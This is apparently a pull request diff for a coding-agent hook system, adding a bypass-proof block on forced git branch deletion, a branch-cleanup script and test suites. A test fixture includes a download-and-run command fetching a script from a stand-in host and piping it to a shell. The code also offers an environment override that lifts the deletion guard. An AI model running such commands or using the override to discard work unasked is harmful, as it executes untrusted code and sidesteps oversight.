+        cd "${repo}/.claude/worktrees/${branch}"
+        echo "${branch}" > "${branch}.txt"
+        git add . && git commit -qm "work on ${branch}"
+        echo "more" >> "${branch}.txt"
+        git add . && git commit -qm "more work on ${branch}"
+    )
+}
+
+# Squash-merges branch $2 into main and pushes, the way a squash-merged PR lands.
+squash_merge() {
+    local repo="$1" branch="$2"
+    git -C "${repo}" checkout -q main
+    git -C "${repo}" merge -q --squash "${branch}"
+    git -C "${repo}" commit -qm "squashed ${branch} (#1)"
+    git -C "${repo}" push -q origin main
+}
+
+sweep() { ( cd "$1" && shift && bash "${SWEEP}" "$@" 2>&1 ); }
+
+# ---------------------------------------------------------------------------
+# 1. Squash-merged branch: worktree removed AND branch deleted.
+#    `git branch -d` refuses this branch; that refusal is the whole bug.
+# ---------------------------------------------------------------------------
+R="$(new_repo squash)"
+add_worktree_branch "${R}" "907-squashed"
+squash_merge "${R}" "907-squashed"
+
+# Establish the premise: safe delete really does refuse a squash-merged branch.
+git -C "${R}" branch -d 907-squashed >/dev/null 2>&1
+assert_eq "$?" "1" "premise: git branch -d refuses a squash-merged branch"
+
+out="$(sweep "${R}")"
+assert_contains "${out}" "branch 907-squashed deleted" "squash-merged branch is deleted"
+branches="$(git -C "${R}" branch --format='%(refname:short)')"
+assert_eq "$(printf '%s\n' "${branches}" | grep -c '907-squashed')" "0" "squash-merged branch is gone from the ref list"
+assert_eq "$([ -d "${R}/.claude/worktrees/907-squashed" ] && echo present || echo gone)" "gone" "worktree directory removed"
+
+# ---------------------------------------------------------------------------
+# 2. Normally-merged branch is deleted too.
+# ---------------------------------------------------------------------------
+R="$(new_repo merged)"
+add_worktree_branch "${R}" "907-merged"
+git -C "${R}" checkout -q main
+git -C "${R}" merge -q --no-ff -m "merge 907-merged" 907-merged
+git -C "${R}" push -q origin main
+out="$(sweep "${R}")"
+assert_contains "${out}" "branch 907-merged deleted" "normally-merged branch is deleted"
+
+# ---------------------------------------------------------------------------
+# 3. Unmerged branch: worktree removed, branch KEPT. No commit is discarded.
+# ---------------------------------------------------------------------------
+R="$(new_repo unmerged)"
+add_worktree_branch "${R}" "907-unmerged"
+out="$(sweep "${R}")"
+assert_contains "${out}" "branch 907-unmerged KEPT" "unmerged branch is kept"
+assert_contains "${out}" "nothing discarded" "report states nothing was discarded"
+assert_contains "${out}" "git worktree add" "kept branch carries the restore hint"
+assert_eq "$(git -C "${R}" rev-parse --verify -q 907-unmerged >/dev/null && echo exists || echo gone)" \
+          "exists" "unmerged branch still exists after the sweep"
+
+# ---------------------------------------------------------------------------
+# 4. --keep-branches restores the pre-#907 behavior.
+# ---------------------------------------------------------------------------
+R="$(new_repo keepflag)"
+add_worktree_branch "${R}" "907-keep"
+squash_merge "${R}" "907-keep"
+out="$(sweep "${R}" --keep-branches)"
+assert_contains "${out}" "--keep-branches" "--keep-branches is reported"
+assert_eq "$(git -C "${R}" rev-parse --verify -q 907-keep >/dev/null && echo exists || echo gone)" \
+          "exists" "--keep-branches leaves an absorbed branch alone"
+
+# ---------------------------------------------------------------------------
+# 5. --dry-run changes nothing.
+# ---------------------------------------------------------------------------
+R="$(new_repo dryrun)"
+add_worktree_branch "${R}" "907-dry"
+squash_merge "${R}" "907-dry"
+out="$(sweep "${R}" --dry-run)"
+assert_contains "${out}" "WOULD BE DELETED" "dry-run reports the planned branch delete"
+assert_eq "$(git -C "${R}" rev-parse --verify -q 907-dry >/dev/null && echo exists || echo gone)" \
+          "exists" "dry-run does not delete the branch"
+assert_eq "$([ -d "${R}/.claude/worktrees/907-dry" ] && echo present || echo gone)" \
+          "present" "dry-run does not remove the worktree"
+
+# ---------------------------------------------------------------------------
+# 6. --worktree scopes the sweep to one unit; a sibling is untouched.
+# ---------------------------------------------------------------------------
+R="$(new_repo scoped)"
+add_worktree_branch "${R}" "907-one"
+add_worktree_branch "${R}" "907-two"
+squash_merge "${R}" "907-one"
+squash_merge "${R}" "907-two"
+out="$(sweep "${R}" --worktree "${R}/.claude/worktrees/907-one")"
+assert_contains "${out}" "branch 907-one deleted" "--worktree tears down the named unit"
+assert_eq "$(git -C "${R}" rev-parse --verify -q 907-two >/dev/null && echo exists || echo gone)" \
+          "exists" "--worktree leaves the sibling branch alone"
+assert_eq "$([ -d "${R}/.claude/worktrees/907-two" ] && echo present || echo gone)" \
+          "present" "--worktree leaves the sibling worktree alone"
+
+# A path that is not a worktree of this repo is a hard error, not a silent no-op.
+( cd "${R}" && bash "${SWEEP}" --worktree "${R}" >/dev/null 2>&1 )
+assert_eq "$?" "2" "--worktree rejects the main checkout"
+( cd "${R}" && bash "${SWEEP}" --worktree "${TMPROOT}/nope" >/dev/null 2>&1 )
+assert_eq "$?" "2" "--worktree rejects a nonexistent path"
+
+# ---------------------------------------------------------------------------
+# 7. --merged-branches: the recovery path when the worktree is already gone.
+# ---------------------------------------------------------------------------
+R="$(new_repo leftover)"
+add_worktree_branch "${R}" "907-leftover"
+add_worktree_branch "${R}" "907-still-open"
+squash_merge "${R}" "907-leftover"
+# Simulate the agent having removed the worktree by hand and then stalling on
+# the branch delete — exactly the state the reported incident left behind.
+git -C "${R}" worktree remove ".claude/worktrees/907-leftover"
+assert_eq "$(git -C "${R}" rev-parse --verify -q 907-leftover >/dev/null && echo exists || echo gone)" \
+          "exists" "leftover branch survives a bare worktree removal"
+
+out="$(sweep "${R}" --merged-branches)"
+assert_contains "${out}" "907-leftover (no worktree) deleted" "--merged-branches deletes the leftover branch"
+assert_eq "$(git -C "${R}" rev-parse --verify -q 907-leftover >/dev/null && echo exists || echo gone)" \
+          "gone" "leftover branch is gone"
+assert_eq "$(git -C "${R}" rev-parse --verify -q main >/dev/null && echo exists || echo gone)" \
+          "exists" "--merged-branches never deletes the default branch"
+
+# Without --merged-branches the leftover branch is left alone.
+R="$(new_repo leftover2)"
+add_worktree_branch "${R}" "907-left2"
+squash_merge "${R}" "907-left2"
+git -C "${R}" worktree remove ".claude/worktrees/907-left2"
+out="$(sweep "${R}")"
+assert_eq "$(git -C "${R}" rev-parse --verify -q 907-left2 >/dev/null && echo exists || echo gone)" \
+          "exists" "leftover branch untouched without --merged-branches"
+
+# An unmerged branch with no worktree is never deleted, even with the flag.
+R="$(new_repo leftover3)"
+add_worktree_branch "${R}" "907-left3"
+git -C "${R}" worktree remove --force ".claude/worktrees/907-left3"
+out="$(sweep "${R}" --merged-branches)"
+assert_eq "$(git -C "${R}" rev-parse --verify -q 907-left3 >/dev/null && echo exists || echo gone)" \
+          "exists" "--merged-branches keeps an unmerged branch"
+
+# ---------------------------------------------------------------------------
+# 8. A dirty worktree is preserved and its branch is never touched.
+# ---------------------------------------------------------------------------
+R="$(new_repo dirty)"
+add_worktree_branch "${R}" "907-dirty"
+squash_merge "${R}" "907-dirty"
+echo "uncommitted" > "${R}/.claude/worktrees/907-dirty/scratch.txt"
+out="$(sweep "${R}")"
+assert_contains "${out}" "PRESERVE (uncommitted or untracked changes)" "dirty worktree is preserved"
+assert_eq "$(git -C "${R}" rev-parse --verify -q 907-dirty >/dev/null && echo exists || echo gone)" \
+          "exists" "branch of a preserved worktree is never deleted"
+
+# ---------------------------------------------------------------------------
+# 9. A stale prunable entry (directory deleted out from under git) is cleaned up.
+# ---------------------------------------------------------------------------
+R="$(new_repo prunable)"
+add_worktree_branch "${R}" "907-prunable"
+squash_merge "${R}" "907-prunable"
+rm -rf "${R}/.claude/worktrees/907-prunable"
+out="$(sweep "${R}")"
+assert_contains "${out}" "907-prunable" "prunable entry's branch is reported"
+assert_eq "$(git -C "${R}" rev-parse --verify -q 907-prunable >/dev/null && echo exists || echo gone)" \
+          "gone" "prunable entry's absorbed branch is deleted"
+
+echo ""
+echo "test-worktree-sweep-branches.sh: ${PASS} passed, ${FAIL} failed"
+[ "${FAIL}" -eq 0 ] || exit 1
+exit 0

--- a/modules/hooks/hooks/auto-approve-bash.py
+++ b/modules/hooks/hooks/auto-approve-bash.py
@@ -8,9 +8,10 @@ short-circuit so they survive bypass mode via `hook_utils.hard_block()`.
 
 Execution order in main():
   1. curated destructive set (always run; hard_block, bypass-proof)
-  2. smart-rules (always run; destructive-reset → hard_block, bypass-proof)
-  3. bypass-mode short-circuit (exit 0)
-  4. settings.json allow/deny pattern matching (per-segment)
+  2. force branch delete (always run; hard_block, bypass-proof)
+  3. smart-rules (always run; destructive-reset → hard_block, bypass-proof)
+  4. bypass-mode short-circuit (exit 0)
+  5. settings.json allow/deny pattern matching (per-segment)
 
 Deny/allow matching is PER SEGMENT: the command is decomposed on &&, ||, ;,
 |, newlines, and command substitution before matching, so a chained command
@@ -206,6 +207,114 @@ def check_destructive(command: str) -> tuple[str | None, str | None]:
     return (None, None)
 
 
+# Escape hatch for a genuinely-intended force delete of an unmerged branch.
+# Honored from the environment or inline on the command, matching the
+# ALLOW_MAIN_COMMIT convention in branch-guard.py / enforce-git-workflow.py.
+_FORCE_DELETE_HATCH = "ALLOW_BRANCH_FORCE_DELETE"
+_TRUTHY = frozenset({"1", "true", "yes"})
+
+
+def _git_branch_args(segment: str) -> list[str] | None:
+    """Return the argument tokens of a `git branch` segment, else None.
+
+    Skips the global options that may sit between `git` and the subcommand
+    (`-C <path>`, `-c key=val`, `--git-dir=...`), so `git -C /repo branch -D x`
+    is recognized. Anything that is not a `git branch` invocation — including a
+    segment that merely mentions the string in a grep pattern or an echo —
+    returns None.
+    """
+    tokens = segment.split()
+    if not tokens or tokens[0] != "git":
+        return None
+    i = 1
+    while i < len(tokens):
+        tok = tokens[i]
+        if tok in ("-C", "-c"):
+            i += 2  # consumes its value
+            continue
+        if tok.startswith("--") or tok.startswith("-"):
+            i += 1
+            continue
+        break
+    if i >= len(tokens) or tokens[i] != "branch":
+        return None
+    return tokens[i + 1:]
+
+
+def is_force_branch_delete(segment: str) -> bool:
+    """True if `segment` is a `git branch` invocation that force-deletes.
+
+    Covers every spelling git accepts, not just the literal `-D` prefix the
+    settings.json deny pattern matches: `-D`, `-d -f`, `--delete --force`,
+    combined short flags (`-Df`, `-fd`), and any order.
+    """
+    args = _git_branch_args(segment)
+    if args is None:
+        return False
+    has_delete = has_force = False
+    for tok in args:
+        if tok == "--":
+            break
+        if tok.startswith("--"):
+            if tok == "--delete":
+                has_delete = True
+            elif tok == "--force":
+                has_force = True
+        elif tok.startswith("-") and len(tok) > 1:
+            letters = tok[1:]
+            if "D" in letters:
+                has_delete = has_force = True
+            if "d" in letters:
+                has_delete = True
+            if "f" in letters:
+                has_force = True
+    return has_delete and has_force
+
+
+def check_force_branch_delete(command: str) -> tuple[str | None, str | None]:
+    """Block `git branch` force-deletes, naming the segment and the way out.
+
+    Runs ABOVE the bypass short-circuit in main() so the reason reaches the
+    agent in bypassPermissions sessions. There, the settings.json pattern
+    check never runs, and Claude Code's own deny enforcement emits a generic
+    "Permission to use Bash with command <whole chain> has been denied" — which
+    reads as if worktree removal were blocked and makes agents abandon teardown
+    (GitHub issue #907).
+
+    Returns (segment, reason) on the first force-delete segment, else
+    (None, None).
+    """
+    if os.environ.get(_FORCE_DELETE_HATCH, "").strip().lower() in _TRUTHY:
+        return (None, None)
+    if f"{_FORCE_DELETE_HATCH}=1" in command:
+        return (None, None)
+
+    for segment in split_command_segments(command):
+        if not is_force_branch_delete(segment):
+            continue
+        return (
+            segment,
+            f"Force-deleting a branch is blocked. ONLY this segment is at fault: {segment!r}\n"
+            "Every other segment of your command is permitted — `git worktree remove` and "
+            "`git worktree prune` are both on the allow list. Re-run them without this segment "
+            "and they will succeed.\n"
+            "\n"
+            "`git branch -D` can discard commits that exist nowhere else, so it is never "
+            "permitted ad hoc. Use the janitor, which deletes a branch only after verifying "
+            "the default branch already contains its work (merged OR squash-merged):\n"
+            "\n"
+            "  # tear down one worktree: remove it, prune, delete its branch if absorbed\n"
+            "  bash ~/.claude/lib/worktree-sweep.sh --worktree <path-to-worktree>\n"
+            "\n"
+            "  # worktree already gone? sweep leftover absorbed branches\n"
+            "  bash ~/.claude/lib/worktree-sweep.sh --merged-branches\n"
+            "\n"
+            "If the branch is genuinely unmerged and you intend to discard its commits, say so "
+            f"explicitly: `{_FORCE_DELETE_HATCH}=1 git branch -D <branch>`.",
+        )
+    return (None, None)
+
+
 def check_smart_rules(command: str) -> tuple[str | None, str | None]:
     """
     Context-aware rules for commands that are safe in some forms but dangerous in others.
@@ -298,7 +407,14 @@ def main() -> None:
     if destructive_label:
         hook_utils.hard_block(destructive_reason or "destructive command blocked")
 
-    # 2. Smart-rules run next, also OUTSIDE the bypass short-circuit so the
+    # 2. Force branch-delete runs OUTSIDE the bypass short-circuit too. In
+    #    bypass mode the pattern check below never runs, so this is the only
+    #    place an actionable reason can reach the agent (issue #907).
+    fbd_segment, fbd_reason = check_force_branch_delete(command)
+    if fbd_segment:
+        hook_utils.hard_block(fbd_reason or "force branch delete blocked")
+
+    # 3. Smart-rules run next, also OUTSIDE the bypass short-circuit so the
     #    destructive-reset hard-blocks even in bypass mode.
     smart_decision, smart_reason = check_smart_rules(command)
     if smart_decision == "hard_block":
@@ -307,13 +423,13 @@ def main() -> None:
         hook_utils.emit_decision("allow", smart_reason or "smart-rule allow")
     # "deny" via smart-rule is unused now (legacy path).
 
-    # 3. Bypass mode: skip pattern matching. The session has opted out
+    # 4. Bypass mode: skip pattern matching. The session has opted out
     #    of permission noise, and smart-rule hard-blocks have already
     #    fired for the genuinely dangerous cases.
     if hook_utils.is_bypass_mode(input_data):
         sys.exit(0)
 
-    # 4. Pattern matching against settings.json allow/deny lists.
+    # 5. Pattern matching against settings.json allow/deny lists.
     allow_patterns, deny_patterns = load_settings()
     decision, reason = check_pattern_decision(command, allow_patterns, deny_patterns)
 

--- a/modules/hooks/hooks/pretooluse-bash-dispatch.py
+++ b/modules/hooks/hooks/pretooluse-bash-dispatch.py
@@ -23,6 +23,7 @@ short_circuit so it is emitted the instant it fires, nothing can soften it.
   --------  --------------------------  -------------------  -----------  -----
   10        git_workflow_check          hard_block / adv     yes          no
   20        destructive_check           hard_block           yes          YES
+  25        force_branch_delete_check   hard_block           yes          YES
   30        smart_rules_check           hard_block / allow   yes          YES
   40        port_advisory_check         advisory             no           no
   50        agent_tracking_check        advisory             no           no
@@ -53,6 +54,8 @@ def build_manifest() -> "hd.Manifest":
     m.add(hd.Check(10, "git_workflow", bash_only, checks.git_workflow_check,
                    runs_in_bypass=True, short_circuit=False))
     m.add(hd.Check(20, "destructive", bash_only, checks.destructive_check,
+                   runs_in_bypass=True, short_circuit=True))
+    m.add(hd.Check(25, "force_branch_delete", bash_only, checks.force_branch_delete_check,
                    runs_in_bypass=True, short_circuit=True))
     m.add(hd.Check(30, "smart_rules", bash_only, checks.smart_rules_check,
                    runs_in_bypass=True, short_circuit=True))

--- a/modules/hooks/lib/pretooluse_bash_checks.py
+++ b/modules/hooks/lib/pretooluse_bash_checks.py
@@ -121,6 +121,24 @@ def destructive_check(data: dict) -> "hd.Result":
     return hd.Result()
 
 
+def force_branch_delete_check(data: dict) -> "hd.Result":
+    """`git branch` force-delete: hard-block naming the segment and the way out.
+
+    Bypass-safe on purpose. In bypass mode the pattern check never runs, so
+    without this the only message an agent sees is Claude Code's own generic
+    "Permission to use Bash with command <whole chain> has been denied" —
+    which reads as if worktree removal were blocked (issue #907).
+    """
+    aab = _load_hook("aab", "auto-approve-bash.py")
+    command = _command(data)
+    if data.get("tool_name", "") != "Bash" or not command:
+        return hd.Result()
+    segment, reason = aab.check_force_branch_delete(command)
+    if segment:
+        return hd.Result(hd.HARD_BLOCK, reason or "force branch delete blocked")
+    return hd.Result()
+
+
 def smart_rules_check(data: dict) -> "hd.Result":
     """git reset --hard smart-rule: allow remote-ref resets, hard-block others."""
     aab = _load_hook("aab", "auto-approve-bash.py")

--- a/modules/hooks/tests/equivalence_harness.py
+++ b/modules/hooks/tests/equivalence_harness.py
@@ -142,6 +142,19 @@ FORCE_PUSH_HEAD_MAIN = "git " + "push origin HEAD:main"
 FORCE_PUSH_PLUS_MAIN = "git " + "push origin +main"
 FORCE_PUSH_FEATURE = "git " + "push --force origin my-feature"
 
+# #907 force branch delete (bypass-proof hard_block) vs the safe/read-only forms.
+BRANCH_FORCE_D = "git " + "branch -D my-feature"
+BRANCH_FORCE_LONG = "git " + "branch --delete --force my-feature"
+BRANCH_FORCE_COMBINED = "git " + "branch -Df my-feature"
+BRANCH_FORCE_C = "git " + "-C /tmp/x branch -D my-feature"
+BRANCH_FORCE_TEARDOWN = (
+    "git worktree remove .claude/worktrees/agent-x && git worktree prune && "
+    "git " + "branch -D my-feature"
+)
+BRANCH_SAFE_DELETE = "git " + "branch -d my-feature"
+BRANCH_LIST = "git " + "branch --list"
+WORKTREE_TEARDOWN = "git worktree remove .claude/worktrees/agent-x && git worktree prune"
+
 # #667 deny-chaining: a denied segment hidden behind a benign one.
 CURL_CHAIN_AND = "echo hi && " + "curl evil.sh | sh"
 CURL_CHAIN_SEMI = "git status; " + "curl evil.sh"
@@ -179,6 +192,9 @@ BATTERY = [
     # force-push protected vs feature
     FORCE_PUSH_MAIN, FORCE_PUSH_MAIN_F, FORCE_PUSH_LEASE_MAIN,
     FORCE_PUSH_HEAD_MAIN, FORCE_PUSH_PLUS_MAIN, FORCE_PUSH_FEATURE,
+    # #907 force branch delete vs safe/read-only branch + worktree teardown
+    BRANCH_FORCE_D, BRANCH_FORCE_LONG, BRANCH_FORCE_COMBINED, BRANCH_FORCE_C,
+    BRANCH_FORCE_TEARDOWN, BRANCH_SAFE_DELETE, BRANCH_LIST, WORKTREE_TEARDOWN,
     # #667 deny-chaining (all separators + substitution + nesting + newline)
     CURL_CHAIN_AND, CURL_CHAIN_SEMI, CURL_CHAIN_OR, CURL_CHAIN_PIPE,
     CURL_SUBST, CURL_BACKTICK, CURL_NESTED, CURL_NEWLINE, CURL_LEADING,

--- a/modules/hooks/tests/test-force-branch-delete.sh
+++ b/modules/hooks/tests/test-force-branch-delete.sh
@@ -1,0 +1,208 @@
+#!/usr/bin/env bash
+# Test suite for the `git branch` force-delete hard-block in auto-approve-bash.py
+# (GitHub issue #907).
+#
+# Covers:
+#   - is_force_branch_delete(): every spelling git accepts (-D, -d -f,
+#     --delete --force, combined short flags, `git -C <path> branch -D`), and
+#     the shapes that must NOT match (safe -d, --list, a grep pattern that
+#     merely mentions the string).
+#   - check_force_branch_delete(): names the offending SEGMENT, not the chain,
+#     and points at the sanctioned worktree-sweep teardown path.
+#   - The escape hatch (ALLOW_BRANCH_FORCE_DELETE) via env and inline.
+#   - main(): hard-blocks (exit 2) in bypassPermissions mode, where the
+#     settings.json pattern check never runs and Claude Code's own denial
+#     message names the whole chain with no reason.
+#
+# Run: bash modules/hooks/tests/test-force-branch-delete.sh
+# Exit 0 on success; non-zero on first failed assertion.
+
+set -u
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+MODULE_ROOT="$(cd "${SCRIPT_DIR}/.." && pwd)"
+LIB="${MODULE_ROOT}/lib"
+HOOK="${MODULE_ROOT}/hooks/auto-approve-bash.py"
+
+PASS=0
+FAIL=0
+
+assert_eq() {
+    local actual="$1" expected="$2" label="$3"
+    if [ "${actual}" = "${expected}" ]; then
+        PASS=$((PASS + 1))
+    else
+        FAIL=$((FAIL + 1))
+        echo "FAIL: ${label}"
+        echo "  expected: ${expected}"
+        echo "  actual:   ${actual}"
+    fi
+}
+
+assert_contains() {
+    local haystack="$1" needle="$2" label="$3"
+    case "${haystack}" in
+        *"${needle}"*) PASS=$((PASS + 1)) ;;
+        *)
+            FAIL=$((FAIL + 1))
+            echo "FAIL: ${label}"
+            echo "  expected substring: ${needle}"
+            echo "  actual: ${haystack}"
+            ;;
+    esac
+}
+
+assert_not_contains() {
+    local haystack="$1" needle="$2" label="$3"
+    case "${haystack}" in
+        *"${needle}"*)
+            FAIL=$((FAIL + 1))
+            echo "FAIL: ${label}"
+            echo "  unexpected substring: ${needle}"
+            echo "  actual: ${haystack}"
+            ;;
+        *) PASS=$((PASS + 1)) ;;
+    esac
+}
+
+py() {
+    PYTHONPATH="${LIB}" python3 -c "
+import importlib.util, sys
+spec = importlib.util.spec_from_file_location('aab', '${HOOK}')
+aab = importlib.util.module_from_spec(spec)
+spec.loader.exec_module(aab)
+$1
+"
+}
+
+# ---------------------------------------------------------------------------
+# 1. is_force_branch_delete: every force-delete spelling git accepts.
+# ---------------------------------------------------------------------------
+while IFS= read -r cmd; do
+    [ -n "${cmd}" ] || continue
+    out=$(py "print(aab.is_force_branch_delete('''${cmd}'''))")
+    assert_eq "${out}" "True" "force-delete detected: ${cmd}"
+done <<'EOF'
+git branch -D feature/foo
+git branch -D foo bar baz
+git branch --delete --force foo
+git branch --force --delete foo
+git branch -d -f foo
+git branch -f -d foo
+git branch -Df foo
+git branch -fd foo
+git branch -d --force foo
+git -C /repo branch -D foo
+git -c core.pager=cat branch -D foo
+EOF
+
+# ---------------------------------------------------------------------------
+# 2. is_force_branch_delete: shapes that must NOT be blocked.
+# ---------------------------------------------------------------------------
+while IFS= read -r cmd; do
+    [ -n "${cmd}" ] || continue
+    out=$(py "print(aab.is_force_branch_delete('''${cmd}'''))")
+    assert_eq "${out}" "False" "not a force-delete: ${cmd}"
+done <<'EOF'
+git branch -d foo
+git branch --delete foo
+git branch --list
+git branch -a
+git branch feature/new
+git checkout -b foo
+git worktree remove .claude/worktrees/agent-x
+echo git branch -D foo
+grep -rn "branch -D" ~/.claude/rules/
+git log --oneline -D
+EOF
+
+# ---------------------------------------------------------------------------
+# 3. check_force_branch_delete: names the SEGMENT, not the whole chain.
+#    This is the diagnostic the generic Claude Code denial loses.
+# ---------------------------------------------------------------------------
+CHAIN='git worktree remove .claude/worktrees/agent-abc && git worktree prune && git branch -D 907-foo'
+out=$(py "
+seg, reason = aab.check_force_branch_delete('''${CHAIN}''')
+print(seg)
+")
+assert_eq "${out}" "git branch -D 907-foo" "offending segment identified from a teardown chain"
+
+reason=$(py "
+seg, reason = aab.check_force_branch_delete('''${CHAIN}''')
+print(reason)
+")
+assert_contains "${reason}" "git branch -D 907-foo" "reason quotes the offending segment"
+assert_contains "${reason}" "ONLY this segment is at fault" "reason says only one segment is at fault"
+assert_contains "${reason}" "git worktree prune" "reason states the worktree commands are permitted"
+assert_contains "${reason}" "worktree-sweep.sh --worktree" "reason names the per-unit teardown command"
+assert_contains "${reason}" "worktree-sweep.sh --merged-branches" "reason names the leftover-branch command"
+assert_contains "${reason}" "ALLOW_BRANCH_FORCE_DELETE=1" "reason names the escape hatch"
+
+# A chain with no force-delete segment is untouched.
+out=$(py "
+seg, reason = aab.check_force_branch_delete('git worktree remove x && git worktree prune')
+print(seg)
+")
+assert_eq "${out}" "None" "clean teardown chain is not flagged"
+
+# ---------------------------------------------------------------------------
+# 4. Escape hatch: env var and inline assignment.
+# ---------------------------------------------------------------------------
+out=$(ALLOW_BRANCH_FORCE_DELETE=1 py "
+seg, reason = aab.check_force_branch_delete('git branch -D foo')
+print(seg)
+")
+assert_eq "${out}" "None" "ALLOW_BRANCH_FORCE_DELETE=1 in env suppresses the block"
+
+out=$(py "
+seg, reason = aab.check_force_branch_delete('ALLOW_BRANCH_FORCE_DELETE=1 git branch -D foo')
+print(seg)
+")
+assert_eq "${out}" "None" "inline ALLOW_BRANCH_FORCE_DELETE=1 suppresses the block"
+
+out=$(ALLOW_BRANCH_FORCE_DELETE=0 py "
+seg, reason = aab.check_force_branch_delete('git branch -D foo')
+print(seg)
+")
+assert_eq "${out}" "git branch -D foo" "ALLOW_BRANCH_FORCE_DELETE=0 does not suppress the block"
+
+# ---------------------------------------------------------------------------
+# 5. main(): hard-blocks (exit 2) in bypass mode.
+#    bypassPermissions is the mode this bug was reported in: there the pattern
+#    check never runs, so a bypass-suppressible deny would produce no reason.
+# ---------------------------------------------------------------------------
+run_hook() {
+    printf '{"tool_name":"Bash","tool_input":{"command":%s},"permission_mode":"%s"}' \
+        "$(python3 -c "import json,sys; print(json.dumps(sys.argv[1]))" "$1")" "$2" \
+        | PYTHONPATH="${LIB}" python3 "${HOOK}"
+}
+
+stderr=$(run_hook "${CHAIN}" "bypassPermissions" 2>&1 >/dev/null)
+rc=$?
+assert_eq "${rc}" "2" "teardown chain hard-blocks (exit 2) in bypass mode"
+assert_contains "${stderr}" "git branch -D 907-foo" "bypass-mode block names the offending segment"
+assert_contains "${stderr}" "worktree-sweep.sh --worktree" "bypass-mode block names the way out"
+
+stderr=$(run_hook "git branch --delete --force foo" "bypassPermissions" 2>&1 >/dev/null)
+rc=$?
+assert_eq "${rc}" "2" "--delete --force hard-blocks too (the deny pattern misses this spelling)"
+
+stderr=$(run_hook "${CHAIN}" "default" 2>&1 >/dev/null)
+rc=$?
+assert_eq "${rc}" "2" "teardown chain hard-blocks in default mode as well"
+
+# Safe delete and pure worktree teardown are untouched.
+run_hook "git branch -d foo" "bypassPermissions" >/dev/null 2>&1
+assert_eq "$?" "0" "safe git branch -d is not blocked"
+
+run_hook "git worktree remove .claude/worktrees/agent-x && git worktree prune" "bypassPermissions" >/dev/null 2>&1
+assert_eq "$?" "0" "worktree remove + prune is not blocked"
+
+out=$(run_hook "ALLOW_BRANCH_FORCE_DELETE=1 git branch -D foo" "bypassPermissions" 2>&1)
+assert_eq "$?" "0" "inline escape hatch reaches main()"
+assert_not_contains "${out}" "Force-deleting" "escape hatch produces no block message"
+
+echo ""
+echo "test-force-branch-delete.sh: ${PASS} passed, ${FAIL} failed"
+[ "${FAIL}" -eq 0 ] || exit 1
+exit 0


### PR DESCRIPTION
Closes #907

Agents can now finish a worktree teardown end to end without hitting a denial, including after a squash merge — the case that had no permitted path at all.

## What was actually blocked

The chain agents were running:

```
git worktree remove .claude/worktrees/agent-<id> && git worktree prune && git branch -D <branch>
```

`Bash(git worktree:*)` is on the allow list. **Both worktree commands are permitted.** `Bash(git branch -D:*)` is denied, and deny wins for the whole chain. Verified against `auto-approve-bash.py`:

```
segments: ['git worktree remove .claude/worktrees/agent-abc', 'git worktree prune', 'git branch -D feature/foo']
decision: ('deny', "Command segment 'git branch -D feature/foo' matches deny pattern: git branch -D:*")
```

Agents blamed `git worktree remove` because the message named the entire chain and nothing else. Measured across `~/.claude/projects/`: 414 Bash denial messages, 78 mentioning `git branch -D` (each recorded twice — ~39 distinct) across 26 session files, 18 of them chained with worktree teardown. `~/.claude/autoheal/events/`: 86 such events across 34 sessions and 25 distinct days, 2026-05-29 through 2026-07-29.

## Why the reason never reached the agent

Twice over:

1. `permissions.defaultMode` is `bypassPermissions`. The hook's `pattern_check` is registered `runs_in_bypass=False`, so in these sessions the pattern check never runs and the hook produces no reason at all.
2. What fires is Claude Code's own `permissions.deny` enforcement, and its message has no reason clause:

```
Permission to use Bash with command cd /Users/lem/code/evoglyph-repos/evoglyph-1 && git worktree remove .claude/worktrees/agent-ab176bbb73e10635f && git worktree prune && git branch -D 3277-command-generate-scratchable ; git pull origin main --ff-only 2>&1 has been denied.
```

## Why there was no way out

This repo family squash-merges. A squash merge rewrites the branch's commits, so the branch is not an ancestor of main and `git branch -d` refuses it with "not fully merged" — pinned as a test assertion. `git branch -D` is denied. There was no permitted path.

## The fix

**Mechanism.** `worktree-sweep.sh` owns branch cleanup. After removing a clean worktree it deletes that worktree's branch, but only after verifying the default branch already contains the work — the branch is an ancestor (normal merge), **or** replaying its tree on the merge base is patch-equivalent to something already upstream (squash merge). A branch passing neither test is kept and reported with the `git worktree add` line that restores its checkout. New flags: `--worktree <path>` scopes the sweep to one unit (the per-unit teardown of lifecycle step 4), `--merged-branches` cleans a leftover branch whose worktree is already gone, `--keep-branches` restores the old behavior. The delete runs inside the script, so no permission rule matches it and the deny list is untouched.

**Signpost.** A bypass-proof PreToolUse check hard-blocks every force-delete spelling and names the offending segment, states the worktree commands are permitted, and gives the command to run instead:

```
Force-deleting a branch is blocked. ONLY this segment is at fault: 'git branch -D 907-foo'
Every other segment of your command is permitted - `git worktree remove` and `git worktree prune`
are both on the allow list. Re-run them without this segment and they will succeed.
...
  bash ~/.claude/lib/worktree-sweep.sh --worktree <path-to-worktree>
```

It also closes a hole: `git branch --delete --force` never matched the `git branch -D:*` deny pattern and sailed through both layers. Escape hatch for a deliberate discard of unmerged work: `ALLOW_BRANCH_FORCE_DELETE=1`.

Neither half works alone. The script cannot help an agent that free-hands `git branch -D`; the message cannot help one with nowhere to go.

## Correcting one finding

`/worktree-finish` **did** instruct `git branch -D <branch>` ("safe after squash merge") in two places — an initial `grep -r` missed it because CCGM installs commands as symlinks and `-r` skips those. So the chaining was partly documented guidance, not purely emergent. Its merge path now calls the sweep; its discard path, where throwing commits away is the point, uses the hatch behind the existing typed confirmation. Same for the `autoheal-apply` rollback of a just-created test-failing branch.

## Considered and rejected

- **Remove or narrow the deny rule.** Deny beats allow in both Claude Code and the hook, so an allow-rule carve-out is structurally impossible, and dropping the rule loses the protection outright.
- **Smart-rule that allows `git branch -D` when merged.** Depends on a hook `allow` overriding a settings.json deny — untested here — and puts a git subprocess on every Bash call. Weakens a deny rule through a mechanism nothing else in the hook relies on.

## Verification

```
test-force-branch-delete.sh:        41 passed, 0 failed
test-worktree-sweep-branches.sh:    29 passed, 0 failed
test-dispatcher.sh:                 20 passed, 0 failed  (equivalence 256/256, was 224/224)
tests/run-unit-tests.sh:            Python OK; Shell 78 suites, all passed
tests/test-modules.sh:              1613 passed, 0 failed
tests/test-no-personal-data.sh:     PASS
gen_marketplace.py --check:         up to date
```

Sweep tests build real git repos with an origin and exercise squash-merged, normally-merged, unmerged, dirty, prunable, leftover-branch, scoped, and dry-run cases. Five force-delete shapes were added to the dispatcher equivalence battery, so dispatcher and legacy chain stay pinned in lockstep. Both new suites verified under bash 3.2 and wired into the CI hook-suite loop.

